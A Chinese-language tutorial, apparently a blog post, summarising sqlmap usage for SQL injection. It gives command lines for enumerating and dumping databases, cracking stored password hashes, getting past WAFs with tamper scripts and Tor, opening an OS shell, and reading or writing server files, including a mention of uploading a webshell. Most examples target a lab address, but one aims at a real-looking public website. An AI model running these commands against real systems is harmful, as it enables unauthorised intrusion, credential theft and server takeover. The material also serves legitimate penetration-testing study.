sqlmap 注入方式、使用总结
目录
Sqlmap
Sqlmap的简单用法
探测指定URL是否存在WAF,并且绕过
探测指定URL是否存在SQL注入漏洞
查看数据库的所有用户
查看数据库所有用户名的密码
查看数据库当前用户
判断当前用户是否有管理权限
列出数据库管理员角色
查看所有的数据库
查看当前的数据库
爆出指定数据库中的所有的表
爆出指定数据库指定表中的所有的列
爆出指定数据库指定表指定列下的数据
爆出该网站数据库中的所有数据
Sqlmap的高级用法
指定脚本进行过滤
探测等级和危险等级
伪造 Http Referer头部
执行指定的SQL语句
执行操作系统命令
从数据库中读取文件
上传文件到数据库服务器中
Sqlmap的更多用法
Sqlmap
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等
Sqlmap采用了以下5种独特的SQL注入技术
- 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
- 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
- 联合查询注入,在可以使用Union的情况下注入
- 堆查询注入,可以同时执行多条语句时的注入
Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。
sqlmap是一个跨平台的工具,很好用,是SQL注入方面一个强大的工具!
我们可以使用 -h 参数查看sqlmap的参数以及用法,sqlmap -h
Sqlmap的简单用法
sqlmap -u "https://www.panohire.com/index.php?g=portal&m=page&a=news&id=25" --dbms=mysql -p id ----current-db --batch
sqlmap -r http.txt #http.txt是我们抓取的http的请求包
sqlmap.py -u “https://www.panohire.com/index.php?g=portal&m=page&a=news&id=25*” --current-db --batch #查看当前数据库名称,--batch表示一切需要选择的选项均使用默认选项
sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie= "抓取的cookie" #当该网站需要登录时,探测该url是否存在漏洞
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data= "uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填入
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #查看数据库的所有用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库用户名的密码
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员角色
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #爆出所有的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables #爆出所有的数据表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #爆出数据库中所有的列
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #爆出security数据库中users表中的所有的列
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username -- dump #爆出数据库security中的users表中的username列中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -- dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -- dump-all #爆出数据库security中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -- dump-all #爆出该数据库中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py #指定脚本进行过滤,用/**/代替空格
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level= 5 --risk= 3 #探测等级5,平台危险等级3,都是最高级别
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #执行指定的sql语句
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell #执行--os-shell命令
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file- read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file- write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms= "MySQL" #指定其数据库为mysql Firebird, HSQLDB, IBM DB2, Informix, Microsoft Access, Microsoft SQL Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent #使用任意的User-Agent爆破
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy= "127.0.0.1:8080" #指定代理
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T #指定时间延迟注入
-v3 输出详细度 最大值 5 会显示请求包和回复包
--threads 5 指定线程数
--fresh-queries 清除缓存
--flush-session 刷新session
--batch 对所有的交互式的都是默认的
--random-agent 任意的http头
--tamper base64encode 对提交的数据进行base64编码
--keep-alive 保持连接,当出现 [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request( s) 保错的时候,使用这个参数
--technique=BE 这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式,当然,我们也可以直接手工指定。
支持的探测方式如下:
- B: Boolean-based blind SQL injection(布尔型注入)
- E: Error-based SQL injection(报错型注入)
- U: UNION query SQL injection(可联合查询注入)
- S: Stacked queries SQL injection(可多语句查询注入)
- T: Time-based blind SQL injection(基于时间延迟注入)
探测指定URL是否存在WAF,并且绕过
--identify-waf 检测是否有WAF(首选)
--check-waf 检测是否有WAF(备选)
#使用参数进行绕过
--random-agent 使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候
--time-sec=3 使用长的延时来避免触发WAF的机制,这方式比较耗时
--hpp 使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--proxy=100.100.100.100:8080 --proxy-cred=211:985 使用代理进行绕过
--ignore-proxy 禁止使用系统的代理,直接连接进行注入
--flush-session 清空会话,重构注入
--hex 或者 --no-cast 进行字符码转换
--mobile 对移动端的服务器进行注入
--tor 匿名注入
探测指定URL是否存在SQL注入漏洞
对于不用登录的网站,直接指定其URL
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞
在探测目标URL是否存在漏洞的过程中,Sqlmap会和我们进行交互。
比如第一处交互的地方是说这个目标系统的数据库好像是Mysql数据库,是否还探测其他类型的数据库。我们选择 n,就不探测其他类型的数据库了,因为我们已经知道目标系统是Mysql数据库了。
第二处交互的地方是说 对于剩下的测试,问我们是否想要使用扩展提供的级别(1)和风险(1)值的“MySQL”的所有测试吗? 我们选择 y。
第三处交互是说已经探测到参数id存在漏洞了,是否还探测其他地方,我们选择 n 不探测其他参数了 。
最后sqlmap就列出了参数id存在的注入类型是boolean盲注,还有payload其他信息也显示出来了,最后还列出了目标系统的版本,php,apache等信息。
这次探测的所有数据都被保存在了 /root/.sqlmap/output/192.168.10.1/ 目录下
对于需要登录的网站,我们需要指定其cookie 。我们可以用账号密码登录,然后用抓包工具抓取其cookie填入
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞
对于是post提交数据的URL,我们需要指定其data参数
sqlmap -u "http://192.168.10.1/sqli/Less-11/?id=1" --data="uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填入
我们也可以通过抓取 http 数据包保存为文件,然后指定该文件即可。这样,我们就可以不用指定其他参数,这对于需要登录的网站或者post提交数据的网站很方便。
我们抓取了一个post提交数据的数据包保存为post.txt,如下,uname参数和passwd参数存在SQL注入漏洞
POST /sqli/Less- 11/ HTTP/ 1.1
Host: 192.168. 10.1
User-Agent: Mozilla/ 5.0 (Windows NT 10.0; WOW64; rv: 55.0) Gecko/ 20100101 Firefox/ 55.0
Accept: text/html,application/xhtml+xml,application/xml; q= 0. 9,* /*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Referer: http: // 192.168. 10.1/sqli/Less- 11/
Connection: close
Upgrade-Insecure-Requests: 1
uname=admin&passwd=admin&submit=Submit
然后我们可以指定这个数据包进行探测
sqlmap -r post.txt #探测post.txt文件中的http数据包是否存在sql注入漏洞
他也会和我们进行交互,询问我们,这里就不一一解释了
可以看到,已经探测到 uname 参数存在漏洞了,问我们是否还想探测其他参数,我们选择的 y ,它检测到passwd也存在漏洞了,问我们是否还想探测其他参数,我们选择 n
然后会让我们选择,在后续的测试中,是选择 uname 这个参数还是passwd这个参数作为漏洞,随便选择一个就好了。
查看数据库的所有用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #查看数据库的所有用户
查看数据库所有用户名的密码
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库用户名的密码
第一处询问我们是否保存密码的hash值为文件,我们不保存。第二处问我们是否使用sqlmap自带的字典进行爆破,我们选择y,可以看出把密码爆破出来了,root用户的密码也为root。如果这里爆破不出来,我们可以拿hash值去字典更强大的地方爆破
查看数据库当前用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的用户
判断当前用户是否有管理权限
查看当前账户是否为数据库管理员账户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限
列出数据库管理员角色
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员角色
查看所有的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs
查看当前的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库
爆出指定数据库中的所有的表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表
爆出指定数据库指定表中的所有的列
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns
爆出指定数据库指定表指定列下的数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump #爆出数据库security中的users表中的username列中的所有数据
爆出该网站数据库中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -- dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -- dump-all #爆出数据库security中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -- dump-all #爆出该数据库中的所有数据
Sqlmap的高级用法
指定脚本进行过滤
有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效)
sqlmap --tamper=space2comment.py #用/**/代替空格
sqlmap --tamper= "space2comment.py,space2plus.py" 指定多个脚本进行过滤
过滤脚本在目录:/usr/share/sqlmap/tamper
支持的数据库 | 编号 | 脚本名称 | 作用 | 实现方式 | 测试通过的数据库类型和版本 |
ALL | 1 | apostrophemask.py | 用utf8代替引号 |
("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
|
2 | base64encode.py | 用base64编码替换 |
("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' |
||
3 | multiplespaces.py | 围绕SQL关键字添加多个空格 |
('1 UNION SELECT foobar') '1 UNION SELECT foobar' |
||
4 | space2plus.py | 用+替换空格 |
('SELECT id FROM users') 'SELECT+id+FROM+users' |
||
5 | nonrecursivereplacement.py |
双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、”")) filters |
('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--' |
||
6 | space2randomblank.py |
代替空格字符(“”)从一个随机的空 白字符可选字符的有效集 |
('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers' |
||
7 | unionalltounion.py | 替换UNION ALL SELECT UNION SELECT |
('-1 UNION ALL SELECT') '-1 UNION SELECT' |
||
8 | securesphere.py | 追加特制的字符串 |
('1 AND 1=1') "1 AND 1=1 and '0having'='0having'" |
||
MSSQL | 1 | space2hash.py | 绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’) |
'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
|
2 | equaltolike.py | like 代替等号 |
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1 |
||
3 | space2mssqlblank.py(mssql) | 空格替换为其它空符号 |
Input: SELECT id FROM users Output: SELECT%08id%02FROM%0Fusers |
* Microsoft SQL Server 2000 * Microsoft SQL Server 2005 |
|
4 | space2mssqlhash.py | 替换空格 |
('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227' |
||
5 | between.py | 用between替换大于号(>) |
('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' |
||
6 | percentage.py | asp允许每个字符前面添加一个%号 |
* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
||
7 | sp_password.py | 追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾 |
('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password' |
||
8 | charencode.py | url编码 |
* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
||
9 | randomcase.py | 随机大小写 |
* Input: INSERT * Output: InsERt |
||
10 | charunicodeencode.py | 字符串 unicode 编码 |
* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
||
11 | space2comment.py | Replaces space character (‘ ‘) with comments ‘/**/’ |
* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users |
||
MYSQL | 1 | equaltolike.py | like 代替等号 |
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1 |
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5 |
2 | greatest.py | 绕过过滤’>’ ,用GREATEST替换大于号。 |
('1 AND A > B') '1 AND GREATEST(A,B+1)=A' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
3 | apostrophenullencode.py | 绕过过滤双引号,替换字符和双引号。 |
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
4 | ifnull2ifisnull.py |
绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’ |
('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)' |
* MySQL 5.0 and 5.5 | |
5 | space2mssqlhash.py | 替换空格 |
('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227' |
||
6 | modsecurityversioned.py | 过滤空格,包含完整的查询版本注释 |
('1 AND 2>1--') '1 /*!30874AND 2>1*/--' |
* MySQL 5.0 | |
7 | space2mysqlblank.py | 空格替换其它空白符号(mysql) |
Input: SELECT id FROM users Output: SELECT%0Bid%0BFROM%A0users |
* MySQL 5.1 | |
8 | between.py | 用between替换大于号(>) |
('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
9 | modsecurityzeroversioned.py | 包含了完整的查询与零版本注释 |
('1 AND 2>1--') '1 /*!00000AND 2>1*/--' |
* MySQL 5.0 | |
10 | space2mysqldash.py | 替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’) |
('1 AND 9227=9227') '1--%0AAND--%0A9227=9227' |
||
11 | bluecoat.py |
代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like |
('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1' |
* MySQL 5.1, SGOS | |
12 | percentage.py | asp允许每个字符前面添加一个%号 |
* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
* Microsoft SQL Server 2000, 2005 * MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 |
|
13 | charencode.py | url编码 |
* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
14 | randomcase.py | 随机大小写 |
* Input: INSERT * Output: InsERt |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
15 | versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# |
||
16 | space2comment.py | Replaces space character (‘ ‘) with comments ‘/**/’ |
* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
17 | charunicodeencode.py | 字符串 unicode 编码 |
* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
* Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 |
|
18 | versionedmorekeywords.py | 注释绕过 |
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# |
||
* MySQL < 5.1 | 19 | halfversionedmorekeywords.py | 关键字前加注释 |
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa * Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa |
* MySQL 4.0.18, 5.0.22 |
20 | halfversionedmorekeywords.py |
当数据库为mysql时绕过防火墙,每个关键字之前添加 mysql版本评论 |
1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") 2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" |
* MySQL 4.0.18, 5.0.22 | |
MySQL >= 5.1.13 | 21 | space2morehash.py | 空格替换为 #号 以及更多随机字符串 换行符 |
* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 |
MySQL 5.1.41 |
Oracle | 1 | greatest.py | 绕过过滤’>’ ,用GREATEST替换大于号。 |
('1 AND A > B') '1 AND GREATEST(A,B+1)=A' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
2 | apostrophenullencode.py | 绕过过滤双引号,替换字符和双引号。 |
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
3 | between.py | 用between替换大于号(>) |
('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
4 | charencode.py | url编码 |
* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
5 | randomcase.py | 随机大小写 |
* Input: INSERT * Output: InsERt |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
6 | charunicodeencode.py | 字符串 unicode 编码 |
* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
* Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 |
|
7 | space2comment.py | Replaces space character (‘ ‘) with comments ‘/**/’ |
* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
PostgreSQL | 1 | greatest.py | 绕过过滤’>’ ,用GREATEST替换大于号。 |
('1 AND A > B') '1 AND GREATEST(A,B+1)=A' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
2 | apostrophenullencode.py | 绕过过滤双引号,替换字符和双引号。 |
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271' |
* MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
3 | between.py | 用between替换大于号(>) |
('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
4 | percentage.py | asp允许每个字符前面添加一个%号 |
* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
* Microsoft SQL Server 2000, 2005 * MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 |
|
5 | charencode.py | url编码 |
* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
6 | randomcase.py | 随机大小写 |
* Input: INSERT * Output: InsERt |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
7 | charunicodeencode.py | 字符串 unicode 编码 |
* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ |
* Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 |
|
8 | space2comment.py | Replaces space character (‘ ‘) with comments ‘/**/’ |
* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users |
* Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 |
|
Microsoft Access | 1 | appendnullbyte.py | 在有效负荷结束位置加载零字节字符编码 |
('1 AND 1=1') '1 AND 1=1%00' |
|
其他 | chardoubleencode.py | 双url编码(不处理以编码的) |
* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 |
||
unmagicquotes.py | 宽字符绕过 GPC addslashes |
* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20 |
|||
randomcomments.py | 用/**/分割sql关键字 |
探测等级和危险等级
Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5
sqlmap一共有3个危险等级,也就是说你认为这个网站存在几级的危险等级。和探测等级一个意思,在不确定的情况下,建议设置为3级,--risk=3
sqlmap使用的payload在目录:/usr/share/sqlmap/xml/payloads
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #探测等级5,平台危险等级3,都是最高级别
伪造 Http Referer头部
Sqlmap可以在请求中伪造HTTP中的referer,当探测等级为3或者3以上时,会尝试对referer注入,可以使用referer命令来欺骗,比如,我们伪造referer头为百度。可以这样
referer http://www.baidu.com
执行指定的SQL语句
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #执行指定的sql语句
然后会提示我们输入要查询的SQL语句,注意这里的SQL语句最后不要有分号
执行操作系统命令
在数据库为Mysql、PostgreSql或者SQL Server时,当满足下面三个条件,我们就可以执行操作系统命令
- 网站必须是root权限
- 攻击者需要知道网站的绝对路径
- GPC为off,php主动转义的功能关闭
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell #执行--os-shell命令
如果我们不知道网站的根目录的绝对路径的话,我们那里选择4 brute force search 暴力破解,尝试破解出根目录的绝对路径!
从数据库中读取文件
当数据库为Mysql、PostgreSQL或SQL Server,并且当前用户有权限时,可以读取指定文件,可以是文本文件或者二进制文件。
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
可以看到,文件读取成功了,并且保存成了 /root/.sqlmap/output/192.168.10.1/files/c__test.txt 文件
上传文件到数据库服务器中
当数据库为Mysql、Postgre SQL或者Sql Server,并且当前用户有权限使用特定的函数时,可以上传文件到数据库服务器。文件可以是文本,也可以是二进制文件。
所以利用上传文件,我们可以上传一句话木马或者上传shell上去。
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt
这里会问我们是否想验证上传成功,我们选择 y 的话,他就会读取该文件的大小,并且和本地的文件大小做比较,只要大于等于本地文件大小即说明上传功能了
Sqlmap的更多用法
除了上面这些用法外,Sqlmap还支持其他的用法,比如定义代理,探测的时候任意的User-Agent头部啊,当我们知道目标数据库类型的时候,直接指定其数据库类型,这样就不会测试其他类型的数据库了
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms=mysql #指定其数据库为mysql
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent #使用任意的User-Agent爆破
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy=PROXY #使用代理进行爆破
-p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sqlmap 注入方式、使用总结相关推荐
- SQLMAP注入教程-11种常见SQLMAP使用方法
一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...
- 利用sqlmap注入获取网址管理员账号密码
1.跨站脚本 原理:指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式. ( ...
- sqlmap注入——POST检测点方法
目录 一.题目 二.解题过程 1. 在输入框输入`'`号,发现有错误提示,说明存在sql注入 2. 判断注入方式 3. sqlmap注入--POST检测点 4.sqlmap注入获取数据库信息 5.查看 ...
- SQLmap注入教程
一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u "存在注入url" 爆出所有数据库名字:sqlmap.py -u "存在注入url ...
- 最全的 Spring 依赖注入方式,你都会了吗?
